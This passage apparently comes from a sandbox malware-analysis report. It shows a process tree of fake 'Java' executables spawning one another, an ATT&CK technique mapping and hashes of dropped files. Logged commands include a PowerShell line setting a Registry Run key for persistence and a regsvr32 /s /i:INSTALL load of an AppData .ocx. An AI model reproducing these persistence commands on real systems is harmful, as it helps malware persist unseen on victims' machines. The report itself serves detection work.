        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        47⤵
        
        PID:436
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        48⤵
        
        PID:6800
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        49⤵
        
        PID:6884
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        50⤵
        
        PID:6624
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        51⤵
        
        PID:1388
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        52⤵
        
        PID:5348
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        53⤵
        
        PID:2420
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        54⤵
        
        PID:6736
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        55⤵
        
        PID:12624
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        56⤵
        
        PID:12596
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        57⤵
        
        PID:12764
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        58⤵
        
        PID:12888
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        59⤵
        
        PID:12828
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        60⤵
        
        PID:7072
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        61⤵
        
        PID:7536
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        62⤵
        
        PID:7932
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        63⤵
        
        PID:664
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        64⤵
        
        PID:8948
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        65⤵
        
        PID:8572
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        66⤵
        
        PID:9680
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        67⤵
        
        PID:9764
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        68⤵
        
        PID:9980
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        69⤵
        
        PID:10448
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        70⤵
        
        PID:10596
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        71⤵
        
        PID:10820
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        72⤵
        
        PID:10788
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        73⤵
        
        PID:10896
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        74⤵
        
        PID:11224
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        75⤵
        
        PID:11332
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        76⤵
        
        PID:6464
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        77⤵
        
        PID:12472
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        78⤵
        
        PID:6864
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplatform_update.exe"
        79⤵
        Modifies registry key
        
        PID:12832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplatform_update.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe\"'"
        79⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7740

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:11660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe"
1⤵
PID:7204
- C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
  2⤵
  PID:4752
- - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
    3⤵
    PID:8128
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
      4⤵
      PID:8716
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        5⤵
        
        PID:8532
      - C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        6⤵
        
        PID:8540
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        7⤵
        
        PID:8608
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        8⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        9⤵
        
        PID:8332
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        10⤵
        
        PID:8464
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        11⤵
        
        PID:6532
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        12⤵
        
        PID:8820
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        13⤵
        
        PID:9176
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        14⤵
        
        PID:9252
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        15⤵
        
        PID:832
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        16⤵
        
        PID:9452
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        17⤵
        
        PID:9064
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        18⤵
        
        PID:9468
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        19⤵
        
        PID:9728
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        20⤵
        
        PID:9016
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        21⤵
        
        PID:9284
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        22⤵
        
        PID:10036
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        23⤵
        
        PID:8904
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        24⤵
        
        PID:10232
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        25⤵
        
        PID:9684
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        26⤵
        
        PID:9660
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        27⤵
        
        PID:10532
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        28⤵
        
        PID:10608
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        29⤵
        
        PID:10708
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        30⤵
        
        PID:11080
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        31⤵
        
        PID:10872
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        32⤵
        
        PID:11160
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        33⤵
        
        PID:11596
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaruntime.exe"
        34⤵
        Modifies registry key
        
        PID:11604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaruntime.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe\"'"
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe"
1⤵
PID:12324
- C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
  2⤵
  PID:12524
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
    3⤵
    PID:13080
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
      4⤵
      PID:2616
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        5⤵
        
        PID:3524
      - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        6⤵
        
        PID:13104
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        7⤵
        
        PID:5000
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        8⤵
        
        PID:228
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        9⤵
        
        PID:3500
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        10⤵
        
        PID:13256
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        11⤵
        
        PID:5460
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        12⤵
        
        PID:4768
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        13⤵
        
        PID:7344
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaruntime.exe"
        14⤵
        Modifies registry key
        
        PID:7308

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:12660

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:12676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{6f46c2e4-7ba8-4eed-a0f7-c92bd9ce4715}\7da195e5-536f-4d0a-8f7a-dc94c116be38.cmd"0
1⤵
PID:10472

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:1080

C:\Windows\system32\regsvr32.EXE
C:\Windows\system32\regsvr32.EXE /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"
1⤵
PID:11000
- C:\Windows\SysWOW64\regsvr32.exe
  /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"
  2⤵
  PID:6420
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:13128

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:9948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\SvdPZAOv\pKTy4L06lQtAX5k5.exe
1⤵
PID:12756
- C:\Users\Admin\AppData\Local\Temp\SvdPZAOv\pKTy4L06lQtAX5k5.exe
  C:\Users\Admin\AppData\Local\Temp\SvdPZAOv\pKTy4L06lQtAX5k5.exe
  2⤵
  PID:16768
- - C:\Users\Admin\AppData\Local\Temp\huw6JK9V\UbZJhaSFPs0nQnZF.exe
    C:\Users\Admin\AppData\Local\Temp\huw6JK9V\UbZJhaSFPs0nQnZF.exe 16768
    3⤵
    PID:16804
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 16804 -s 512
      4⤵
      Program crash
      PID:25876
- - C:\Users\Admin\AppData\Local\Temp\SvdPZAOv\NAN2z9m9x45U4hu0.exe
    C:\Users\Admin\AppData\Local\Temp\SvdPZAOv\NAN2z9m9x45U4hu0.exe 16768
    3⤵
    PID:19568
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 19568 -s 820
      4⤵
      Program crash
      PID:17300
- - C:\Users\Admin\AppData\Local\Temp\SvdPZAOv\ZejvcFnmDoUe1jiW.exe
    C:\Users\Admin\AppData\Local\Temp\SvdPZAOv\ZejvcFnmDoUe1jiW.exe 16768
    3⤵
    PID:17372
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 17372 -s 464
      4⤵
      Program crash
      PID:12960
- - C:\Users\Admin\AppData\Local\Temp\SvdPZAOv\s2xs7YhJdPiERpG8.exe
    C:\Users\Admin\AppData\Local\Temp\SvdPZAOv\s2xs7YhJdPiERpG8.exe 16768
    3⤵
    PID:13996
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 13996 -s 640
      4⤵
      Program crash
      PID:10760
- - C:\Users\Admin\AppData\Local\Temp\SvdPZAOv\crnKNPi7vDjmOkZZ.exe
    C:\Users\Admin\AppData\Local\Temp\SvdPZAOv\crnKNPi7vDjmOkZZ.exe 16768
    3⤵
    PID:11916
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 11916 -s 1276
      4⤵
      Program crash
      PID:14868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 12568 -ip 12568
1⤵
PID:16528

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:2460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 12024 -ip 12024
1⤵
PID:19644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 16804 -ip 16804
1⤵
PID:25852

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:25996

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:17392

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:26164

C:\Windows\system32\regsvr32.EXE
C:\Windows\system32\regsvr32.EXE /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"
1⤵
PID:19824
- C:\Windows\SysWOW64\regsvr32.exe
  /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"
  2⤵
  PID:26224
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:26320

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:24824

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:20404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 15824 -ip 15824
1⤵
PID:17060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 15776 -ip 15776
1⤵
PID:17176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 19568 -ip 19568
1⤵
PID:17216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 17372 -ip 17372
1⤵
PID:11428

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:4568

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:9640

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:11380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 13996 -ip 13996
1⤵
PID:8412

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:6520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 11916 -ip 11916
1⤵
PID:14696

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:24072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5856 -ip 5856
1⤵
PID:20744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 19740 -ip 19740
1⤵
PID:19796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Authentication Process

T1556

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

T1497

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\KVRT2020_Data\Temp\7C924DD4D20055C80007791130E2D03F\klupd_367f83e6a_arkmon.sys

Filesize
390KB

MD5
7c924dd4d20055c80007791130e2d03f

SHA1
072f004ddcc8ddf12aba64e09d7ee0ce3030973e

SHA256
406ab7d6e45dbedcfbd2d7376a643620c7462cece3e41115c8fbc07861177ec6

SHA512
ab26005da50cbf1f45129834cb661b5b97aed5637d4ebc9821c8b744ff61c3f108f423ae5628602d99b3d859e184bfb23900797538dca2891186321d832ea806

Download Submit
C:\KVRT2020_Data\Temp\ioc62F34DD0-2434-C94C-BF6F-46A3A6B9F6E4.hta

Filesize
779B

MD5
39c8cd50176057af3728802964f92d49

SHA1
68fc10a10997d7ad00142fc0de393fe3500c8017

SHA256
f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

SHA512
cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

Download Submit
C:\KVRT2020_Data\Temp\iocF370F89E-736B-3A40-9EC5-139D7449F852.hta

Filesize
717B

MD5
28fd514561af0b0ed3d05bcde63fbbca

SHA1
ca3f2d3f6393025e887148d08ffa0abaeb4867fc

SHA256
9ccde4c4b3839a2bf2d660adfb078fda911908020b9ddb4063c2476c33ba6b86

SHA512
9d6a9d3068bbf78181e4fc2dfbf60e31fc367d58d9f932d381458aaea79113758cf068d8de244a87fc3d51ce7f307ca00ba1a5abcdb0536d5025d4f3b1c5bdd9

Download Submit
C:\Program Files\chrome_Unpacker_BeginUnzipping9412_664958507\_locales\en\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\ProgramData\0rqi5\cbimyu

Filesize
160KB

MD5
9b85a4b842b758be395bc19aba64799c

SHA1
c32922b745c9cf827e080b09f410b4378560acb3

SHA256
ecc8d7540d26e3c2c43589c761e94638fc5096af874d7df216e833b9599c673a

SHA512
fad80745bb64406d8f2947c1e69817cff57cc504d5a8cdca9e22da50402d27d005988f6759eaa91f1f7616d250772c9f5e4ec2f98ce7264501dd4f436d1665f0

Download Submit
C:\ProgramData\0rqi5\g4ekxt0zu

Filesize
40KB

MD5
dfd4f60adc85fc874327517efed62ff7

SHA1
f97489afb75bfd5ee52892f37383fbc85aa14a69

SHA256
c007da2e5fd780008f28336940b427c3bfd509c72a40bfb7759592149ff3606e

SHA512
d76f75b1b5b23aa4f87c53ce44c3d3b7e41a44401e53d89f05a114600ea3dcd8beda9ca1977b489ac6ea5586cf26e47396e92d4796c370e89fab0aa76f38f3c4

Download Submit
C:\ProgramData\8gdtjm7gva.exe

Filesize
251KB

MD5
58d3a0d574e37dc90b40603f0658abd2

SHA1
bf5419ce7000113002b8112ace2a9ac35d0dc557

SHA256
dcc05c3ac7ae22d601bcb7c97cfcda568f3041bd39b2fd8899282dfde83369a5

SHA512
df61329a32e9261b01c5b7d95e0d9a3fb8cc36e5d90ede72bc16befe00fb32c221898a8346db9de07c0f5dcba57dcdbb09a22ca8b73223f989d33ec433c3a90a

Download Submit
C:\ProgramData\IDAEHCFHJJJJECAAFBKJ

Filesize
56KB

MD5
1c832d859b03f2e59817374006fe1189

SHA1
a4994a54e9f46a6c86ff92280c6dabe2bcd4cc42

SHA256
bb923abf471bb79086ff9ace293602e1ad882d9af7946dda17ff1c3a7e19f45b

SHA512
c4d3be414fa5dd30151cde9f6d808d56c26b031ff3f6446d21a15d071053787b6ba337b12909a56af7bb420f858dba5213f08e64ca9f836f52c98a18762b4bef

Download Submit
C:\ProgramData\as2dj\8ym7yu

Filesize
96KB

MD5
6066c07e98c96795ecd876aa92fe10f8

SHA1
f73cbd7b307c53aaae38677d6513b1baa729ac9f

SHA256
33a2357af8dc03cc22d2b7ce5c90abf25ac8b40223155a516f1a8df4acbf2a53

SHA512
7d76207c1c6334aa98f79c325118adf03a5ba36b1e2412803fd3e654a9d3630c775f32a98855c46342eba00d4a8496a3ded3686e74beaac9c216beee37aa5cb7

Download Submit
C:\ProgramData\as2dj\dbs0z5

Filesize
288KB

MD5
38900ccd101437482eae3211bc4b69d8

SHA1
e911f87b873cc355453676173d40c3a9a80d0a6e

SHA256
98f19f67642ad1339d2f3e0e21fab15944e38c76e29d85ac4bdf828804ad52cd

SHA512
